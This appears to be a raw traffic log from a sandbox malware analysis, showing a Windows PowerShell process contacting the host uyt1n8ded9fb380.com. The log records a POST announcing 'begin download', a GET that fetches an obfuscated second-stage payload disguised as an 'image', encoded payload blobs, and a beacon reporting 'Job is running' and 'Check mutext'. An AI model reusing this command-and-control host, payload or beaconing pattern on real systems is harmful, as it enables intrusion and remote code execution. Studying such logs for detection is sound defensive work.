                                                                                                        2024-11-08 10:10:35 UTC310INData Raw: 25 64 65 6d 6f 6b 72 64 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 50 6c 69 4e 57 47 6d 34 55 31 65 53 4c 30 6d 75 54 6c 69 60 57 31 54 76 55 30 53 4e 60 31 34 70 50 55 4f 5b 4c 6d 6d 35 56 59 71 47 4f 54 34 44 5b 7b 47 4e 4c 6a 31 30 56 6d 53 73 4c 54 30 44 63 46 79 5b 57 46 62 79 56 57 53 6b 4f 44 34 70 57 55 4b 4e 57 46 69 75 56 6c 71 4f 64 57 71 75 56 6c 69 4f 60 6c 69 70 55 6a 53 4e 63 54 30 37 54 6c 79 51 57 30 6a 7b 56 56 71 56 60 6a 38 54 63 46 75 5b 64 6a 57 34 56 6d 53 6b 65 31 30 54 57 59 69 4e 60 6a 47 34 55 6c 71 43 4c 30 71 54 54 55 57 4f 60 6d 6a 30 56 6d
                                                                                                        Data Ascii: %demokrd<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#PliNWGm4U1eSL0muTli`W1TvU0SN`14pPUO[Lmm5VYqGOT4D[{GNLj10VmSsLT0DcFy[WFbyVWSkOD4pWUKNWFiuVlqOdWquVliO`lipUjSNcT07TlyQW0j{VVqV`j8TcFu[djW4VmSke10TWYiN`jG4UlqCL0qTTUWO`mj0Vm
                                                                                                        2024-11-08 10:10:35 UTC1369INData Raw: 32 69 5b 60 6d 6a 7b 56 56 30 52 60 6d 71 70 52 55 4b 5b 57 46 75 35 55 6b 4b 4e 60 31 34 59 55 55 53 4f 53 47 71 6e 56 6a 65 4b 4c 44 30 75 53 6c 6d 51 57 44 4b 70 55 6f 71 46 60 54 34 54 56 55 43 5b 63 54 57 35 55 6b 4b 5b 64 44 30 49 53 6c 6d 5b 4c 6d 6d 35 55 31 53 47 64 44 34 59 56 59 71 4e 53 44 71 70 55 6c 30 57 64 44 30 44 56 55 47 5b 64 6a 5b 72 55 31 53 57 64 6d 6d 59 56 56 6d 51 65 7b 43 4d 52 6a 65 4e 65 6c 53 59 4f 55 43 4b 53 45 43 6f 55 57 53 43 65 31 38 32 4c 44 75 44 54 56 38 4e 50 33 62 76 52 30 71 74 57 6f 57 5b 4c 30 4b 76 58 6b 48 31 5b 30 54 78 57 6f 57 60 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 6b 53 31 5b 34 56 57 62 76 63 31 6d 46 65 47 47 57 4c 45 6d 71 58 56 30 56 60 6c 53 46 4c 46 65 4a 53 32 69 33 56 6b 40 79 64 6d 71 34
                                                                                                        Data Ascii: 2i[`mj{VV0R`mqpRUK[WFu5UkKN`14YUUSOSGqnVjeKLD0uSlmQWDKpUoqF`T4TVUC[cTW5UkK[dD0ISlm[Lmm5U1SGdD4YVYqNSDqpUl0WdD0DVUG[dj[rU1SWdmmYVVmQe{CMRjeNelSYOUCKSECoUWSCe182LDuDTV8NP3bvR0qtWoW[L0KvXkH1[0TxWoW`P1H2SGGw[1mEPVekS1[4VWbvc1mFeGGWLEmqXV0V`lSFLFeJS2i3Vk@ydmq4
                                                                                                        2024-11-08 10:10:35 UTC1193INData Raw: 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 4b 50 31 47 6f 52 54 44 76 52 33 5b 53 4c 44 75 44 54 59 40 7b 58 54 65 72 62 30 71 55 5b 33 75 5b 4c 6b 6a 79 58 6c 34 53 5b 31 79 59 5b 45 43 4b 53 44 47 76 53 47 47 76 4f 31 53 53 63 31 71 44 54 56 38 4a 5b 44 69 4a 4f 56 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6d 53 60 57 7b 57 73 52 54 4f 4a 60 57 71 59 5b 49 43 68 60 54 4b 73 58 6b 4f 6a 65 56 4b 49 4e 56 69 60 50 31 47 73 5b 47 69 4a 62 44 6d 70 62 31 34 45 5b 33 75 4a 52 6a 65 4e 65 6c 4b 74 54 6c 79 68 63 6d 47 6f 54 47 4f 42 52 6c 4b 74 56 6f 5b 69 4c 6d 57 31 57 6b 4b 56 60 57 57 75 57 6f 69 6a 57 30 5b 37 5b 44 4f 43 65 47 5b 58 52 6f 43 4b 50 30 48 79 58
                                                                                                        Data Ascii: OC[1mEPVeKP1GoRTOCUjOqPVeKP1GoRTOC[3[SLDuKP1GoRTDvR3[SLDuDTY@{XTerb0qU[3u[LkjyXl4S[1yY[ECKSDGvSGGvO1SSc1qDTV8J[DiJOVW2LDuKP1GoRTOC[1mEPmS`W{WsRTOJ`WqY[ICh`TKsXkOjeVKINVi`P1Gs[GiJbDmpb14E[3uJRjeNelKtTlyhcmGoTGOBRlKtVo[iLmW1WkKV`WWuWoijW0[7[DOCeG[XRoCKP0HyX


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.11.3049764172.67.137.624431276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:35 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180ec5cd00cfed1263e3ebfcf33acd7e0e HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 308
                                                                                                        2024-11-08 10:10:35 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 37 31 64 39 31 36 35 66 33 63 39 61 32 39 62 34 66 39 66 64 36 36 36 34 34 30 61 35 36 32 38 64 37 62 64 61 65 61 34 39 33 64 36 30 37 63 66 31 63 31 39 34 38 35 37 63 39 65 39 35 30 39 65 61 38 35 61 37 38 36 35 36 35 38 66 66 33 32 66 66 61 32 38 63 34 33 66 33 34 65 39 66 37 62 35 63 39 39 64 63 31 32 65 37 30 31 35 31 36 30 32 36 30 37 65 34 39 32 36 39 65 32 35 65 35 34 38 66 66 35 36 62 33 34 35 62 66 37 66 39 66 39 61 61 66 63 35 65 33 37 33 38 31 62 36 37 62 64 63 66 32 36 61 39 31 37 63 64 35 63 38 30 36 61 64 62 34 32 61 62 39 30 63 37 31 62 35 36 34 62 61 31 37 66 31 30
                                                                                                        Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/71d9165f3c9a29b4f9fd666440a5628d7bdaea493d607cf1c194857c9e9509ea85a7865658ff32ffa28c43f34e9f7b5c99dc12e70151602607e49269e25e548ff56b345bf7f9f9aafc5e37381b67bdcf26a917cd5c806adb42ab90c71b564ba17f10
                                                                                                        2024-11-08 10:10:36 UTC931INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:36 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wd45SppGQUZPvz3sDdPKXmgJNojONqvGnZR39IP0HT5dAbziogaZfQZ0tfNaxBZGdbwLivLim2R8tLMKcy54EV2wBH2YfrVGHA59aqNqIGTgh8TwEJPkGYh3FXjPI7SwWi8vNetsGlEN"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=31820&sent=107&recv=120&lost=0&retrans=0&sent_bytes=38710&recv_bytes=68785&delivery_rate=4821664&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c62ddfe380d0-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102484&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1258&delivery_rate=37503&cwnd=252&unsent_bytes=0&cid=5fcc8703cfa36037&ts=850&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.11.3049765172.67.137.624431276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:36 UTC370OUTGET /file2/71d9165f3c9a29b4f9fd666440a5628d7bdaea493d607cf1c194857c9e9509ea85a7865658ff32ffa28c43f34e9f7b5c99dc12e70151602607e49269e25e548ff56b345bf7f9f9aafc5e37381b67bdcf26a917cd5c806adb42ab90c71b564ba17f10abcf18115f342c6e1065c1e853af HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        2024-11-08 10:10:37 UTC1056INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:37 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 21824
                                                                                                        Connection: close
                                                                                                        content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FRfBsIzAQBzCZponrNR4ASBniTPI14ztZKMBnKM0Vh7ivpMB93u4asPUFIuG9Z0zbtlke1mlDd5iowC1lWcaV7PzhOKknv2LtPDaL%2BkznHuZbQWMfOPJC%2BIbh%2BvaGJ3441MC1%2Fbn6yHF"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=36023&sent=109&recv=122&lost=0&retrans=0&sent_bytes=39448&recv_bytes=69792&delivery_rate=4821664&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c6349c9742eb-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102302&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1008&delivery_rate=37429&cwnd=252&unsent_bytes=0&cid=521c6383ca06ae36&ts=807&x=0"
                                                                                                        2024-11-08 10:10:37 UTC313INData Raw: 25 71 6e 7b 69 65 74 74 65 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 4c 54 30 70 57 6c 6d 51 57 30 47 35 56 56 71 5b 4c 31 30 37 55 59 71 51 53 30 4b 70 55 6d 53 60 63 44 30 54 55 6c 75 51 53 30 54 7b 55 6a 65 53 4f 44 34 54 54 55 43 60 57 44 34 6e 55 6c 71 46 60 54 30 75 55 59 71 4f 64 6a 57 37 55 57 65 5b 4c 31 30 37 55 59 69 4e 57 31 54 76 55 59 71 73 4c 6a 30 70 56 6c 75 4f 64 54 6a 32 53 47 47 77 55 6a 4f 71 55 56 65 53 4c 31 71 72 56 57 69 52 63 44 6d 49 53 56 65 6b 4c 6a 34 34 58 57 69 42 4c 44 6d 49 52 6f 4f 68 4c 6a 34 78 52 54 65 60 65 6c 4f 71 50 6b 43 69 53
                                                                                                        Data Ascii: %qn{iette<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#LT0pWlmQW0G5VVq[L107UYqQS0KpUmS`cD0TUluQS0T{UjeSOD4TTUC`WD4nUlqF`T0uUYqOdjW7UWe[L107UYiNW1TvUYqsLj0pVluOdTj2SGGwUjOqUVeSL1qrVWiRcDmISVekLj44XWiBLDmIRoOhLj4xRTe`elOqPkCiS
                                                                                                        2024-11-08 10:10:37 UTC1369INData Raw: 59 4c 46 65 4d 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 58 7b 4f 52 64 56 47 59 4f 56 34 58 54 30 4b 75 58 57 65 35 63 47 57 49 53 6b 43 69 50 32 65 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 7b 4f 4e 4c 46 4f 75 63 49 57 60 4c 55 43 73 56 6c 30 72 62 30 71 56 57 6f 6d 68 50 55 43 4d 52 54 4f 43 5b 31 6d 45 60 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 46 53 6d 71 56 53 6c 69 44 57 30 57 72 52 6d 4f 72 55 56 65 4b 60 31 71 72 56 6b 4b 72 65 54 6d 47 54 6f 5b 6a 4c 6b 57 7b 58 6b 4b 46 60 31 6d 45 54 6c 30 69 57 32 69 72 57 54 65 46 4c 46 47 45 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 34 50 6a 53 69 53 30 5b 70 58 59 6d 42 62 47 71 71 50 6b 43 69 53 30 57 6f 56 6c 30 72 62 30 71 55 50 6c 79 6d 53 33 79 37 5b 44 69 4f 55 6a
                                                                                                        Data Ascii: YLFeMPUCMRTOC[1mEPVeKP1KhX{ORdVGYOV4XT0KuXWe5cGWISkCiP2eNP3mC[1mEPVeKP1GoW{ONLFOucIW`LUCsVl0rb0qVWomhPUCMRTOC[1mE`14E[{CMRTOC[1mFSmqVSliDW0WrRmOrUVeK`1qrVkKreTmGTo[jLkW{XkKF`1mETl0iW2irWTeFLFGERUeDTV8oRTOC[1m4PjSiS0[pXYmBbGqqPkCiS0WoVl0rb0qUPlymS3y7[DiOUj
                                                                                                        2024-11-08 10:10:37 UTC1369INData Raw: 54 55 47 72 52 6d 4f 57 62 47 53 4b 50 31 71 4d 58 6b 4b 4b 5b 30 71 75 53 6f 43 68 53 30 5b 73 52 54 69 52 65 6a 6d 48 55 6b 43 5b 56 44 6e 76 55 46 6d 4b 55 6a 4f 74 4c 44 34 45 5b 7b 43 4d 53 47 47 77 55 6a 4f 6f 4c 44 75 60 63 6d 5b 30 56 55 4f 52 62 46 48 78 4f 46 65 52 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 59 53 52 63 56 79 7b 56 6d 57 60 64 56 48 78 4c 57 5b 6b 63 59 65 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 52 44 4b 6e 58 33 30 46 65 44 6d 45 5b 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 31 35 76 58 33 30 72 65 57 6e 79 4c 46 75 56 56 44 71 7b 55 44 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 6c 4c 7b 54 6f 6d 69 57 7b 57 74 56 47 4f 52 53 57 71 58 55 6b 43 69 57 7b 57 6e 5b 44 65 72 65 6c 4b 6f 4c 44 75 4b 50 31 47
                                                                                                        Data Ascii: TUGrRmOWbGSKP1qMXkKK[0quSoChS0[sRTiRejmHUkC[VDnvUFmKUjOtLD4E[{CMSGGwUjOoLDu`cm[0VUORbFHxOFeRS{j{Xl05emmYTYSRcVy{VmW`dVHxLW[kcYeo[YbvR1mEPVeKRDKnX30FeDmE[14E`TGoRTOC[1mEPVeYL15vX30reWnyLFuVVDq{UDDvR1mEPVeKP1GoRTOBXlL{TomiW{WtVGORSWqXUkCiW{Wn[DerelKoLDuKP1G
                                                                                                        2024-11-08 10:10:37 UTC1369INData Raw: 6b 43 6b 52 47 58 76 54 6c 30 72 62 30 71 56 50 6c 69 6a 53 33 65 7b 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 62 78 52 6b 57 6a 53 30 5b 6a 52 6a 5b 6e 65 6c 4f 73 65 46 79 6d 54 31 44 34 52 54 53 47 55 6a 4f 71 50 56 65 4b 50 31 47 76 53 47 47 77 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 69 52 64 56 57 55 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 30 6f 57 56 30 56 60 47 71 45 50 6b 43 69 53 30 57 6f 56 6c 30 72 62 30 71 55 50 6f 43 68 63 6d 4b 33 52 54 65 47 5b 30 6d 74 63 45 43 60 54 31 4b 6e 58 33 34 4a 60 46 57 53 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 75 60 63 56 79 7b 56 6d 57 4a 4f 56 53 49 57 6f 71 4b 53 45 43 6f 57 7b 47 4e 4f 56 4c 7b 54 6c 79 68 54 7b 57 4a 57 49 6a 30 53 33 47 59
                                                                                                        Data Ascii: kCkRGXvTl0rb0qVPlijS3e{SGGwUjOqPVeKP1GoRTOC[0bxRkWjS0[jRj[nelOseFymT1D4RTSGUjOqPVeKP1GvSGGwUjOoLDuKP1GoRTiRdVWUPkeDTV8oRTOC[1mEPVeKP10oWV0V`GqEPkCiS0WoVl0rb0qUPoChcmK3RTeG[0mtcEC`T1KnX34J`FWSLDuKP1GoRTOC[1mEPVu`cVy{VmWJOVSIWoqKSECoW{GNOVL{TlyhT{WJWIj0S3GY
                                                                                                        2024-11-08 10:10:37 UTC517INData Raw: 4f 43 5b 31 6d 48 50 6c 69 6b 63 54 5b 31 52 54 4f 6f 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 62 7b 55 6b 43 6b 63 56 79 30 56 6b 44 76 60 30 4b 75 63 49 4f 60 57 55 57 6e 58 6d 65 57 5b 30 43 55 50 56 6d 60 57 7b 47 32 5b 44 69 73 65 56 53 48 60 45 43 4b 60 59 65 6f 52 54 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 6c 47 59 4f 55 43 58 54 30 4b 57 58 57 62 79 63 46 48 7b 57 6b 43 57 4c 6d 5b 70 58 6b 48 30 60 33 4f 34 50 55 6d 4b 53 47 6d 32 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 43 4c 44 75 4b 50 31 47 6f 52 54 4f 73 55 6a 4f 6f 4c 44 75 44 54 56 38 6f 52 54 4f 43 5b 31 71 48 54 6c 79 68 56 44 4b 49 58 6b 4b 35 60 30 71 58 52 56 65 50 54 31 4b 68 57 55 4f 72 64 6c 53 49 57 6f 53 4c 60 33 79 50 55
                                                                                                        Data Ascii: OC[1mHPlikcT[1RTOoUjOqPVeKP1GoRTOC[0b{UkCkcVy0VkDv`0KucIO`WUWnXmeW[0CUPVm`W{G2[DiseVSH`ECK`YeoRTDvR1mEPVeKP1GoRTOBXlGYOUCXT0KWXWbycFH{WkCWLm[pXkH0`3O4PUmKSGm2RTOC[1mEPVeKP1GoRTOC[1mCLDuKP1GoRTOsUjOoLDuDTV8oRTOC[1qHTlyhVDKIXkK5`0qXRVePT1KhWUOrdlSIWoSL`3yPU
                                                                                                        2024-11-08 10:10:37 UTC1369INData Raw: 72 55 56 65 4b 60 30 71 76 58 6a 65 57 5b 30 71 58 60 49 43 6b 4c 30 4b 37 55 33 6d 43 60 30 71 75 63 49 4f 60 57 6a 4b 6e 5b 44 65 6f 60 54 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 4f 5b 30 4b 49 57 6f 4f 60 56 47 4b 72 52 54 69 52 63 30 71 55 50 6c 30 69 57 32 69 72 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 5b 4a 63 46 4b 59 4e 55 4b 60 54 7b 47 4a 5b 44 65 56 65 44 6d 45 4c 57 47 5b 56 47 4b 77 52 54 4f 52 63 56 47 59 64 46 79 57 53 31 58 76 58 54 4f 43 65 47 4b 75 4e 59 6d 5b 4c 6d 57 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 57 5b 72 57 57 65 47 55 6d 71 55 57 56 79 4d 57 59 6d 43 60 57 4b 75 63 49 4f 60 54 31 4b 73 56 6d 65 35 63 46 53 49 57 6c 75 51 60 54 47 73 56 6c 30 72 62 30
                                                                                                        Data Ascii: rUVeK`0qvXjeW[0qX`ICkL0K7U3mC`0qucIO`WjKn[Deo`TSSc14E`TGoRTOC[1mEPVeKP1GoRTOO[0KIWoO`VGKrRTiRc0qUPl0iW2irSGGw[1mEPVeKP1GoRT[JcFKYNUK`T{GJ[DeVeDmELWG[VGKwRTORcVGYdFyWS1XvXTOCeGKuNYm[LmWNP3mC[1mEPVeKP1GoWW[rWWeGUmqUWVyMWYmC`WKucIO`T1KsVme5cFSIWluQ`TGsVl0rb0
                                                                                                        2024-11-08 10:10:37 UTC1369INData Raw: 56 57 69 4f 5b 30 71 75 4e 55 47 68 63 57 47 6f 56 57 62 30 60 31 6d 49 54 6c 79 68 53 30 58 76 56 6d 65 53 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 44 71 72 5b 44 69 56 64 56 4b 71 50 56 75 6a 52 44 6e 79 56 6d 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 4e 54 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 64 54 4b 58 56 57 65 72 4c 44 6d 49 56 6f 5b 6b 60 54 4b 6e 52 54 69 4e 63 33 48 7b 52 6b 43 4b 53 33 79 30 5b 44 65 56 64 56 53 75 53 6f 4f 4b 53 31 71 72 56 6c 31 34 64 57 71 55 50 6c 71 69 53 30 5b 70 58 55 4b 72 65 57 71 34 50 6c 69 60 4c 6a 5b 76 58 6c 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 57 46 53 49 53 6f 6d 6a 50 7b 47 54 58 6a 65 56 63 46 4f 45 50 59 53 57 4c 6d 5b
                                                                                                        Data Ascii: VWiO[0quNUGhcWGoVWb0`1mITlyhS0XvVmeSUjOqPVeKP1GoRTOC[1mEPVeKRDqr[DiVdVKqPVujRDnyVmDvR1mEPVeKP1GoRTOBNTSSc14E`TGoRTOC[1mEPVeKdTKXVWerLDmIVo[k`TKnRTiNc3H{RkCKS3y0[DeVdVSuSoOKS1qrVl14dWqUPlqiS0[pXUKreWq4Pli`Lj[vXlbvR1mEPVeKP1GoRTOBWFSISomjP{GTXjeVcFOEPYSWLm[
                                                                                                        2024-11-08 10:10:37 UTC1369INData Raw: 44 34 69 57 31 34 34 58 6b 4f 4e 65 6d 71 74 54 6c 4f 58 53 6c 53 76 58 6c 30 52 65 6c 50 7b 55 6c 4f 58 53 54 35 79 58 33 34 4a 63 46 4b 74 54 6d 65 60 56 44 71 37 58 57 62 34 65 57 69 46 64 47 47 68 4c 6f 69 76 56 55 4b 72 63 46 4c 79 64 46 4f 57 4c 33 79 37 5b 44 65 56 65 44 75 55 4f 54 5b 68 63 54 5b 71 58 6a 65 56 55 57 5b 57 53 55 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 43 4c 44 75 4b 50 31 47 6f 52 54 65 72 63 54 75 45 54 6f 43 6b 4c 57 5b 42 54 55 40 34 65 30 71 59 4f 46 65 4c 57 30 5b 35 52 54 53 47 62 44 53 53 63 33 65 4b 50 31 47 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 33 47 58 55 6d 5b 53 57 54 34 50 58 31 65 56 65 54 6d 44 4c 46 65 4d 53 56 53 72 5b 44 4c 79 52 6c 53 49 57 6f 53 57 52 44 71 33 58 31 65 56 64 56 53 48
                                                                                                        Data Ascii: D4iW144XkONemqtTlOXSlSvXl0RelP{UlOXST5yX34JcFKtTme`VDq7XWb4eWiFdGGhLoivVUKrcFLydFOWL3y7[DeVeDuUOT[hcT[qXjeVUW[WSUeDTV8oRTOC[1mCLDuKP1GoRTercTuEToCkLW[BTU@4e0qYOFeLW0[5RTSGbDSSc3eKP1Go[YbvR1mEPVeKP1GoRTOC`3GXUm[SWT4PX1eVeTmDLFeMSVSr[DLyRlSIWoSWRDq3X1eVdVSH
                                                                                                        2024-11-08 10:10:37 UTC1369INData Raw: 43 47 64 57 47 57 5b 44 34 53 57 55 6d 42 54 57 69 6a 50 6d 4b 47 4c 54 4b 54 4c 44 5b 45 58 6d 57 46 53 57 47 57 53 6a 34 57 57 54 57 34 54 57 57 52 56 6d 47 57 4f 55 4f 53 57 47 5b 42 54 6a 57 46 50 6d 53 72 53 6a 4b 4f 57 54 5b 48 57 30 57 46 55 30 47 57 52 6f 4b 53 57 57 4b 56 54 57 54 79 63 6d 47 58 63 44 4b 52 53 32 53 42 57 33 30 6a 50 6a 34 47 53 6a 69 57 57 54 5b 51 57 57 57 4a 63 30 47 57 5b 44 34 53 57 55 47 52 54 56 30 31 50 6d 48 79 63 44 4b 54 57 6a 5b 45 58 54 57 46 52 47 65 57 53 6c 47 53 57 54 58 30 54 57 57 52 52 6d 47 57 4e 57 4b 53 57 47 4b 42 54 6a 57 46 50 6d 53 75 5b 44 4b 4f 57 54 5b 47 58 55 43 46 55 6c 50 76 52 6c 38 53 57 57 4b 4a 54 57 54 30 50 6d 47 75 60 44 4b 52 53 54 5b 42 57 46 34 6a 50 6a 30 47 53 6a 57 5b 4c 44 5b 51 57
                                                                                                        Data Ascii: CGdWGW[D4SWUmBTWijPmKGLTKTLD[EXmWFSWGWSj4WWTW4TWWRVmGWOUOSWG[BTjWFPmSrSjKOWT[HW0WFU0GWRoKSWWKVTWTycmGXcDKRS2SBW30jPj4GSjiWWT[QWWWJc0GW[D4SWUGRTV01PmHycDKTWj[EXTWFRGeWSlGSWTX0TWWRRmGWNWKSWGKBTjWFPmSu[DKOWT[GXUCFUlPvRl8SWWKJTWT0PmGu`DKRST[BWF4jPj0GSjW[LD[QW
                                                                                                        2024-11-08 10:10:37 UTC1369INData Raw: 53 57 54 34 42 54 57 57 72 50 6d 47 59 5b 44 4b 53 4c 54 5b 42 56 55 4f 6a 50 31 30 47 53 6a 6d 55 57 54 5b 6e 57 57 57 4a 4c 57 47 57 5b 46 71 53 57 6a 5b 74 54 56 34 60 50 6d 48 79 53 6a 4b 60 57 6a 5b 42 56 6b 43 46 53 54 30 47 53 6a 71 53 57 54 71 71 54 57 57 6e 55 6d 47 59 54 6a 4b 53 63 6c 79 42 54 6b 4b 31 50 6d 6d 75 5b 44 4f 68 60 31 5b 49 55 54 57 46 55 47 47 57 53 6f 4b 53 57 56 50 7b 54 57 65 4a 4c 30 47 75 4f 54 4b 52 57 44 4b 42 56 55 4f 6a 50 33 4b 73 53 6a 53 53 57 54 5b 75 54 57 57 46 63 6d 47 57 57 6a 34 53 57 31 6e 7b 54 56 34 56 50 6d 4f 46 63 44 4b 59 63 44 5b 45 5b 57 57 46 52 57 57 57 53 6d 65 53 57 54 6e 78 54 57 57 4f 65 30 47 56 55 6c 34 53 63 6f 43 42 54 6f 71 6e 50 6d 6d 75 5b 44 4b 6b 53 54 5b 47 58 7b 43 46 53 57 57 57 53 6a
                                                                                                        Data Ascii: SWT4BTWWrPmGY[DKSLT[BVUOjP10GSjmUWT[nWWWJLWGW[FqSWj[tTV4`PmHySjK`Wj[BVkCFST0GSjqSWTqqTWWnUmGYTjKSclyBTkK1Pmmu[DOh`1[IUTWFUGGWSoKSWVP{TWeJL0GuOTKRWDKBVUOjP3KsSjSSWT[uTWWFcmGWWj4SW1n{TV4VPmOFcDKYcD[E[WWFRWWWSmeSWTnxTWWOe0GVUl4ScoCBToqnPmmu[DKkST[GX{CFSWWWSj


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.11.3049766172.67.137.624431276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:38 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fcc8d19123b48461b1b5d1cd9e HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 85
                                                                                                        2024-11-08 10:10:38 UTC85OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                        Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
                                                                                                        2024-11-08 10:10:39 UTC936INHTTP/1.1 200 OK
